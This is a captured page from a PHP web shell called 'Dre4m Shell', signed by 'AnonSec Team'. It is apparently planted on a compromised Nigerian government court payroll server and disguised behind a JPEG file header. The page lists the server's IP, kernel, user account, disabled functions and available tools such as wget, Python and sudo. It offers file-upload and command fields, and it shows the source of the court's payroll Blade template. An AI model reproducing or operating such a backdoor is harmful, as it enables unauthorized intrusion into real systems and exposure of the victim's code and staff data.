ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 52.15.195.71
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/npay.pdf.nicn.gov.ng/resources/views/pecard/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/npay.pdf.nicn.gov.ng/resources/views/pecard/peCardNamesRecent.blade.php
@extends('layouts.layout')
@section('pageTitle')
PE-CARD
@endsection
@section('content')
<!-- /.box-header -->
<div class="box-body">
  <div class="row">
    <div class="col-md-8 col-md-offset-2">
      <b><p class="profile-username text-center text-success">NATIONAL INDUSTRIAL COURT OF NIGERIA
      </p></b>
      <b><p class="profile-username text-center text-success">PAYROLL</p></b>
      <b><p class="text-muted text-left ">Payroll P.V. No:</p></b>
      <p class="text-muted text-left ">MINISTRY/DEPARTMENT: NATIONAL INDUSTRIAL COURT OF NIGERIA, {{session('division')}} DIVISION </p>
      <b><p class="text-muted text-left "> MONTH ENDING: {{$bankName}} {{$bankgroup}}</p></b>
      <table class="table table-hover">
        <tr>
            <th>
               <div>
                  File No
                  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                  &nbsp;&nbsp;&nbsp;
                  Name
                  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                  &nbsp;&nbsp;&nbsp;
                  <div class="text-center" style="margin-top: -20px; margin-left: 110px;"> 
                     Current Bank Group
                  </div>
                  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                  &nbsp;&nbsp;&nbsp;
                  <div class="pull-right" style="margin-top: -20px;"> 
                     
                  </div>
              </div>
            </th>    
        </tr> 
        @foreach ($users as $user)
        <tr>
           <td> 
              <div>
                <a  href = "{{url('pecard/pereport/'. $user->fileNo.'/'.$user->year )}}">  {{ $user->fileNo }} 
                    &nbsp;&nbsp;&nbsp;  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
                    {{ $user->name  }} 
                    &nbsp;&nbsp;&nbsp;  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                    @php
                        $newBankGroup = DB::table('tblper')
                          ->select('bankGroup')
                          ->where('fileNo', $user->fileNo)
                          ->first();
                    @endphp
                    <div class="text-center" style="margin-left: 110px; margin-top: -25px;"> 
                      {{$newBankGroup->bankGroup}}
                    </div>
                    &nbsp;&nbsp;&nbsp;  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                    <div class="pull-right" style="width: 35%"> 
                        <small>
                        @if($newBankGroup->bankGroup != $user->bankGroup)
                          This person shows under bank group {{$user->bankGroup}}  because he/she has been paid using this bank group {{$user->bankGroup}} but the Current/New bank group is: {{$newBankGroup->bankGroup}}. 
                          @endif
                        </small>
                    </div>
                    
                </a>
              </div>
           </td>
            </tr>
          @endforeach
         
        </table>
      </div>
    </div>
    <!-- /.box-body -->
  </div>
  <!-- /.box -->
    @endsection

Anon7 - 2022
AnonSec Team